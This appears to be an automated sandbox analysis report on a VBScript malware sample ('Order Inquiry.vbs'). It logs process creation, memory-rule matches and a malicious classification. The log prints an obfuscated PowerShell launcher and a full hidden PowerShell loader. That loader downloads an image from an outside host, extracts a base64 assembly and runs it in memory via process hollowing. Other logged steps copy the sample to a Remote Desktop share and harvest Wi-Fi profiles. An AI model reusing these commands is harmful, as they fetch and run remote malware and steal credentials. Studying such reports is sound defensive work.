Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_01691184	9_2_01691184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_0169125D	9_2_0169125D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_01693970	9_2_01693970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_01691F68	9_2_01691F68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_01691441	9_2_01691441
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_016934E0	9_2_016934E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_016934D0	9_2_016934D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_01691F4E	9_2_01691F4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_06425208	9_2_06425208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_064293D0	9_2_064293D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_064243D8	9_2_064243D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_064293A5	9_2_064293A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_06423E88	9_2_06423E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_066F1340	9_2_066F1340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_066F1331	9_2_066F1331
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_066F5910	9_2_066F5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_06705F68	9_2_06705F68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_06707F1E	9_2_06707F1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_06708E20	9_2_06708E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_06708A48	9_2_06708A48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_067F2E50	9_2_067F2E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_067F2EC8	9_2_067F2EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_0683BBF8	9_2_0683BBF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_0683CB61	9_2_0683CB61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_0683BBE9	9_2_0683BBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_068CEA40	9_2_068CEA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_066FC128	9_2_066FC128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_066FC116	9_2_066FC116

Source: Order Inquiry.vbs

Initial sample: Strings found which are bigger than 50

Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@21/25@6/5

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\3dasY[1].txt

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\878411
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h5ze3qi.xk1.ps1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: AddInProcess32.exe, 00000009.00000002.1738432443.0000000006191000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, tmp3198.tmp.dat.9.dr, tmpA565.tmp.dat.9.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
